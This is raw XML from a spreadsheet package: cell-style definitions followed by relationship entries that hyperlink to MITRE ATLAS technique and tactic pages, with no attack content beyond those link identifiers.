    <xf numFmtId="0" fontId="11" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="33" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="28" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="6" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="5" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="27" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="25" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="8" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="40">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="8" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="14" fontId="4" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="3" xfId="8" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>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vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="8" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"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atlas.mitre.org/techniques/AML.T0046" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.001" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.002" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.004" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0003" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0001" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0004" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0072" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0066" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.001" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0070" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0058" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0019" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0060" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.001" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0020" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.000" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0041" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.003" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0052" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.001" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002.001" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.003" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0074" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.003" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011.001" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0067" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0047" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0077" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0061" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0068" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0065" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0053" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0054" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0057" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.000" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.001" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.004" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.000" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051.001" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0073" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.000" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.002" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0064" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0044" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.000" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0071" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.001" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0056" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.002" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0049" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0025" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0015" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0021" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0059" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0031" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0040" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0018.002" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0078" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.002" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0062" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0063" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0013" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0014" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0007" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0051.000" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.004" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0017" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0029" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002.000" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0037" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0036" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.002" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0034" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0076" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.000" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.004" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.001" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0050" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0075" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0067.000" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.002" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.001" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0017.000" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043.000" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0042" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0012" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048.003" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.002" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.000" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0055" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011.000" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.001" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0005.000" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0000.002" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.002" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.001" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0079" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.000" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0052.000" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0006" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0035"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atlas.mitre.org/tactics/AML.TA0010" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0005" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0008" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0007" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0013" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0014" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0009" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0000" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/tactics/AML.TA0003" TargetMode="External"/><Relationship Id="rId14" 